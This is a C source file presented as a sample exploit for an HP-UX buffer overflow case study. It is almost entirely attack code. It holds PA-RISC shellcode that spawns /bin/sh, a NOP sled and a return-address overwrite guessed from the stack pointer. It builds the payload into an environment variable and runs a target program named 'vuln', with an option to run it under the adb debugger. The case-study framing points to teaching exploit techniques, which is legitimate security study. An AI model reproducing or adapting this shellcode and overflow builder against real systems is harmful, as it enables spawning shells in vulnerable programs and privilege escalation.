/*
 * Sample exploit for HP-UX buffer overflows case study
 */
#include <stdio.h>
#include <unistd.h>


char shellcode[]=
"\xe8\x3f\x1f\xfd\xb4\x23\x03\xe8\x60\x60\x3c\x61\x0b\x39\x02"
"\x99\x34\x1a\x3c\x53\x0b\x43\x06\x1a\x20\x20\x08\x01\x34\x16\x03"
"\xe8\xe4\x20\xe0\x08\x96\xd6\x03\xfe/bin/shA";

#define BUFFER_SIZE 180
#define STACK_DSO -84
#define NOP 0x0b390280
#define PAD 0
#define ALIGN 8
#define ADB_PATH "/usr/bin/adb"
#define VULNVAR "VULNBUF="
#define MORE 1


unsigned long get_sp(void)
{
   __asm__("copy %sp,%ret0 \n");
}

int main(int argc, char **argv) {
int i, dso, align, padd, buf_size, adb, more;
char *buf, *ptr;
unsigned long retaddr;


dso = STACK_DSO;
align = ALIGN;
padd = PAD;
buf_size = BUFFER_SIZE;
retaddr = 0;
more = MORE;




while ((i = getopt(argc, argv,
                   "Dd:b:r:o:a:p:m:")) != EOF) {
	switch (i) {
	case 'd':
        dso=(int) strtol(optarg, NULL, 0);
        break;
	case 'm':
        more+=(int) strtol(optarg, NULL, 0);
        break;
	case 'b':
        buf_size=(int)strtol(optarg, NULL, 0);
        break;
    case 'r':
        retaddr = strtoul(optarg, NULL, 0);
        break;
	case 'a':
	    align = (int) strtol(optarg, NULL, 0);
	    break;
	case 'p':
	    padd = (int) strtol(optarg, NULL, 0);
	    break;
    case 'D':
        adb = 1;  
        break;
	default:
	    fprintf(stderr, "usage: %s [-b buffer_size] [-d dso] "
            "[-r return_address]"
		    "[-a align] [-p pad] [-D] [-m more_rets]\n", argv[0]);
	    exit(1);
	    break;
	}
}


buf=(char *)calloc(strlen(VULNVAR) + buf_size
                   + sizeof(unsigned long)*more + 1, 1);
ptr=buf;
if (!buf) {
    perror("calloc");
    exit(1);
}

fprintf(stderr,"our stack %X\n",get_sp());
if (!retaddr)
    retaddr=get_sp()- dso + 3;
fprintf(stderr, "Using: ret: 0x%X pad: %i align: %i"
                " buf_len: %i dso: %i more: %i\n",
        retaddr, padd, align, buf_size, dso, more);

strcpy(buf, VULNVAR);
ptr+=strlen(VULNVAR);
for(i=0;i<align; i++) *ptr++='A'; // fill in alignment

for(i=0;i<(buf_size-strlen(shellcode)-align-padd)/4;i++) { // fill in some nops
    *ptr++=(NOP>>24)&0xff;
    *ptr++=(NOP>>16)&0xff;
    *ptr++=(NOP>>8)&0xff;
    *ptr++=(NOP)&0xff;
}

strcat(buf, shellcode); // append shellcode
ptr+=strlen(shellcode);

for(i=0;i<padd; i++) *ptr++='B'; // padd

for (i=0;i<more ; i++) {
    *ptr++=(retaddr>>24)&0xff;
    *ptr++=(retaddr>>16)&0xff;
    *ptr++=(retaddr>>8)&0xff;
    *ptr++=(retaddr)&0xff;
}
fprintf(stderr,"buflen is %i\n", strlen(buf));
putenv(buf,1);
if (adb) 
    execl(ADB_PATH,"adb","vuln", NULL);
else     
    execl("./vuln","vuln",buf, NULL);
perror("execl");
return 0; // uff
}